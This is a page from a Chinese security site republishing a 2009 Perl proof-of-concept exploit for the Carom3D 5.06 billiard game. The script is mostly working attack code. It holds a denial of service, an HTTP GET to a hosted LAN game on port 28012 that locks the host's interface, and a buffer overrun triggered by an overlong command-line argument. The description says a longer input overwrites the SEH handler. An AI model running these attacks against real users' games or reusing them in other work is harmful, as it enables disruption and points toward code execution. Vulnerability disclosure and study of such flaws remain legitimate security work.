首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Carom3D 5.06 Unicode Buffer Overrun/DoS Vulnerability
来源:vfocus.net 作者:vfocus 发布时间:2009-06-17   
#!/usr/bin/perl
#
# Title: Carom3D 5.06 Unicode Buffer Overrun/Denial Of Service Vulnerability
#
#
# Summary: Carom 3D is an online multi-user billiard game created with special
#	   3D graphic effects bringing every aspect such as 6 ball, 9 ball, 8
#	   ball and other Billiard games to life.
#
# Product Web Page: http://www.carom3d.com/
#
# Description: The world famous korean game Carom3D suffers from a buffer overflow
#	       and a denial of service vulnerability. The BoF is triggered at
#	       runtime when we append 218 > bytes as an argument. ~1000 bytes
#	       overwrites SEH. The denial of service is triggered when a user
#	       creates a LAN Game (cred. needed), creates a room and awaits
#	       other players to join the game. While awaiting (listening on port
#	       28012), with a simple HTTP GET/POST, an attacker can lockdown
#	       the GUI of the user created the room, not alowing to start or
#	       even exit the game's GUI, unless forced quit (X).
#
# Tested On: Microsoft Windows XP Professional SP3 (English)
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# http://www.zeroscience.org/
#
# 15.06.2009
#

# ----------------------------------DoS---------------------------------- #

use LWP::Simple;

my $url = 'http://192.168.1.3:28012';
my $lockdown = get $url;
die "Couldn't get $url" unless defined $lockdown;

# You can Ctrl+C, the lockdown is ON.

# ---------------------------------/DoS---------------------------------- #





###########################################################################





# ----------------------------------BoF---------------------------------- #

# Added 217 bytes as argument = runs normally.
# Added 218 bytes as argument triggers the MS VC++ Runtime Library
# 'Buffer Overrun' error msg box informing us that the program's
# internal state is corrupted.

system('C:\\Progra~1\\Neoact\\Carom3D\\carom.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');

# ---------------------------------/BoF---------------------------------- #

# [2009-06-16]
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·McAfee 3.6.0.608 naPolicyManag
·linux/x86 setreuid(geteuid(),g
·Green Dam 3.17 URL Processing
·solaris/x86 portbind/tcp shell
·Joomla Component com_jumi (fil
·XOOPS <= 2.3.3 Remote File Dis
·The Recipe Script 5 Remote XSS
·Multiple HTTP Server Low Bandw
·phportal v1 (topicler.php id)
·FretsWeb 1.2 (name) Remote Bli
·vBulletin Radio and TV Player
·compface <= 1.5.2 (XBM File) L
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved